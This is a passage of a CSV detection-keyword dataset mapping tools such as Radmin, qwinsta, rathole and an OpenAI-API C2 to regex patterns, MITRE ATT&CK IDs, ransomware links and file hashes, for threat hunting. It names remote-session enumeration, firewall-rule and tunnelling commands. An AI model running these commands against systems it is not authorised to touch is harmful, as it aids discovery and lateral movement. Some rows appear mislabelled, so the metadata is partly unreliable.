T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A" "*cmd.exe*qwinsta*",".{0,1000}cmd\.exe.{0,1000}qwinsta.{0,1000}","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A" "*qwinsta /server:*",".{0,1000}qwinsta\s\/server\:.{0,1000}","greyware_tool_keyword","qwinsta","enumerate rdp session on a remote server","T1049 - T1018 - T1021.001","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","3","8","N/A","N/A","N/A","N/A" "*/Radmin.exe*",".{0,1000}\/Radmin\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Radmin_Server_*.msi*",".{0,1000}\/Radmin_Server_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Radmin_Viewer_*.msi*",".{0,1000}\/Radmin_Viewer_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/Radmin_VPN_1.*.exe*",".{0,1000}\/Radmin_VPN_1\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - 
TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/rserver3.exe*",".{0,1000}\/rserver3\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Local\Temp\*_Radmin_3.*.zip*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}_Radmin_3\..{0,1000}\.zip.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\AppData\Roaming\Radmin*",".{0,1000}\\AppData\\Roaming\\Radmin.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Radmin.exe*",".{0,1000}\\Radmin\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\RADMIN.EXE-*.pf*",".{0,1000}\\RADMIN\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\Radmin\radmin.rpb*",".{0,1000}\\Radmin\\radmin\.rpb.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Radmin_Server_*.msi*",".{0,1000}\\Radmin_Server_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Radmin_Viewer_*.msi*",".{0,1000}\\Radmin_Viewer_.{0,1000}\.msi.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Radmin_VPN_1.*.exe*",".{0,1000}\\Radmin_VPN_1\..{0,1000}\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rserver3.exe*",".{0,1000}\\rserver3\.exe.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rsetup64.exe*/stop*",".{0,1000}\\rsetup64\.exe.{0,1000}\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - 
T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rsl.exe /setup*",".{0,1000}\\rsl\.exe\s\/setup.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\rsl.exe*/stop*",".{0,1000}\\rsl\.exe.{0,1000}\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\Radmin Server *",".{0,1000}\\Start\sMenu\\Programs\\Radmin\sServer\s.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Start Menu\Programs\Radmin Viewer *",".{0,1000}\\Start\sMenu\\Programs\\Radmin\sViewer\s.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\SysWOW64\rserver30\FamItrf2*",".{0,1000}\\SysWOW64\\rserver30\\FamItrf2.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*\SysWOW64\rserver30\FamItrfc*",".{0,1000}\\SysWOW64\\rserver30\\FamItrfc.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*\Windows\SysWOW64\rserver30\*",".{0,1000}\\Windows\\SysWOW64\\rserver30\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*>Famatech Corp.<*",".{0,1000}\>Famatech\sCorp\.\<.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","#companyname","N/A","10","10","N/A","N/A","N/A","N/A" "*download.radmin.com*",".{0,1000}download\.radmin\.com.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*download.radmin-vpn.com*",".{0,1000}download\.radmin\-vpn\.com.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Radmin\*",".{0,1000}HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Radmin\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control 
program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*netsh advfirewall firewall add rule name=""Radmin Server *",".{0,1000}netsh\sadvfirewall\sfirewall\sadd\srule\sname\=\""Radmin\sServer\s.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Program Files (x86)\Radmin Viewer 3\*",".{0,1000}Program\sFiles\s\(x86\)\\Radmin\sViewer\s3\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*radmin /connect:*",".{0,1000}radmin\s\/connect\:.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Radmin Server V3*",".{0,1000}Radmin\sServer\sV3.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","ServiceName","10","10","N/A","N/A","N/A","N/A" "*Radmin Viewer 3\CHATLOGS\*",".{0,1000}Radmin\sViewer\s3\\CHATLOGS\\.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 
- TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Radmin Viewer 3\rchatx.dll*",".{0,1000}Radmin\sViewer\s3\\rchatx\.dll.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*radmin.exe* /connect:*",".{0,1000}radmin\.exe.{0,1000}\s\/connect\:.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rserver3 /start*",".{0,1000}rserver3\s\/start.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rserver3 /stop*",".{0,1000}rserver3\s\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*rserver3.exe*/start*",".{0,1000}rserver3\.exe.{0,1000}\/start.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" 
"*rserver3.exe*/stop*",".{0,1000}rserver3\.exe.{0,1000}\/stop.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Settings for Radmin Server.lnk*",".{0,1000}Settings\sfor\sRadmin\sServer\.lnk.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Stop Radmin Server.lnk*",".{0,1000}Stop\sRadmin\sServer\.lnk.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*support.radmin.com*",".{0,1000}support\.radmin\.com.{0,1000}","greyware_tool_keyword","Radmin","Radmin is a remote control program that lets you work on another computer through your own","T1021 - T1076 - T1563","TA0008 - TA0009 - TA0002","N/A","Akira","RMM","https://www.radmin.com/download/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*https://gofile.io/d/*",".{0,1000}https\:\/\/gofile\.io\/d\/.{0,1000}","greyware_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","downloading files from gofile.io","10","3","261","40","2024-08-28T22:39:08Z","2022-08-01T15:14:59Z" "*https://tox.chat/download.html*",".{0,1000}https\:\/\/tox\.chat\/download\.html.{0,1000}","greyware_tool_keyword","ransomware_notes","detection patterns retrieved in 
ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","3","261","40","2024-08-28T22:39:08Z","2022-08-01T15:14:59Z" "*https://api.openai.com/v1/files*",".{0,1000}https\:\/\/api\.openai\.com\/v1\/files.{0,1000}","greyware_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","0","1","N/A","risk of False positive","10","10","6","3","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "* rathole.exe",".{0,1000}\srathole\.exe","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/frpc-mem.log*",".{0,1000}\/frpc\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/frps-mem.log*",".{0,1000}\/frps\-mem\.log.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole.exe",".{0,1000}\/rathole\.exe","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" 
"*/rathole.git*",".{0,1000}\/rathole\.git.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole/src/*",".{0,1000}\/rathole\/src\/.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole-aarch64-*",".{0,1000}\/rathole\-aarch64\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole-arm*",".{0,1000}\/rathole\-arm.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole-main/*",".{0,1000}\/rathole\-main\/.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole-mipsel-*",".{0,1000}\/rathole\-mipsel\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server 
with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*/rathole-x86_64*",".{0,1000}\/rathole\-x86_64.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","1","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole.exe",".{0,1000}\\rathole\.exe","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole\src\*",".{0,1000}\\rathole\\src\\.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole-aarch64-*",".{0,1000}\\rathole\-aarch64\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole-arm*",".{0,1000}\\rathole\-arm.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole-main\*",".{0,1000}\\rathole\-main\\.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole-mips-*",".{0,1000}\\rathole\-mips\-.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*\rathole-x86_64*",".{0,1000}\\rathole\-x86_64.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*| vegeta attack -duration 10s > /dev/null*",".{0,1000}\|\svegeta\sattack\s\-duration\s10s\s\>\s\/dev\/null.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*| vegeta attack -rate *",".{0,1000}\|\svegeta\sattack\s\-rate\s.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","N/A","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*0059214c35241df34371e16ec368ef02023ca321cbdc8608c36ab75c4b14cab4*",".{0,1000}0059214c35241df34371e16ec368ef02023ca321cbdc8608c36ab75c4b14cab4.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*016d82ec6cf3550ac4dea3881c248a0d544f09144881557439aa6e4b0f134989*",".{0,1000}016d82ec6cf3550ac4dea3881c248a0d544f09144881557439aa6e4b0f134989.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*024db78c74b32524c54cc8617d1c7dbcd742b0d99bf44087ad85c2e913ca4156*",".{0,1000}024db78c74b32524c54cc8617d1c7dbcd742b0d99bf44087ad85c2e913ca4156.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*0581143b11d99500ea1fd4b61775c395276fd3ec2a0352cf3b9050274ddd8068*",".{0,1000}0581143b11d99500ea1fd4b61775c395276fd3ec2a0352cf3b9050274ddd8068.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*05da4e917b0c66df49df25e8e1139d57a8bfd6454ecd3e69ebb433fe0a52988c*",".{0,1000}05da4e917b0c66df49df25e8e1139d57a8bfd6454ecd3e69ebb433fe0a52988c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*065886fd1e058334a56aae3730a9291f35cc144a858a0435d17773f85b3fb5c9*",".{0,1000}065886fd1e058334a56aae3730a9291f35cc144a858a0435d17773f85b3fb5c9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*075860a08ea0a48a076989f101341a2b20f62e493fc045e9b3f2c6b04fee7374*",".{0,1000}075860a08ea0a48a076989f101341a2b20f62e493fc045e9b3f2c6b04fee7374.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*082b4796f2b2fb7a81f9f00a8b2008713fba88eb8d80266c12a24a8ed3379101*",".{0,1000}082b4796f2b2fb7a81f9f00a8b2008713fba88eb8d80266c12a24a8ed3379101.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*0aef9a7896fe8bcad991aec5afc995529bd676169494759b4c5b0d4867431da0*",".{0,1000}0aef9a7896fe8bcad991aec5afc995529bd676169494759b4c5b0d4867431da0.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*0e7eb9d663478b8e6567d14c86a08b41e179a6ff7af69f44d343a05aa5082c23*",".{0,1000}0e7eb9d663478b8e6567d14c86a08b41e179a6ff7af69f44d343a05aa5082c23.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*0efb7bcf56f438180692206231d7119baf1696a927a64097ff0e4fdeb2d7b68a*",".{0,1000}0efb7bcf56f438180692206231d7119baf1696a927a64097ff0e4fdeb2d7b68a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*0f37caadfbf7eb1c8d7462487deec3080ca824c06ab1cef3a17ee803f80e0b96*",".{0,1000}0f37caadfbf7eb1c8d7462487deec3080ca824c06ab1cef3a17ee803f80e0b96.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
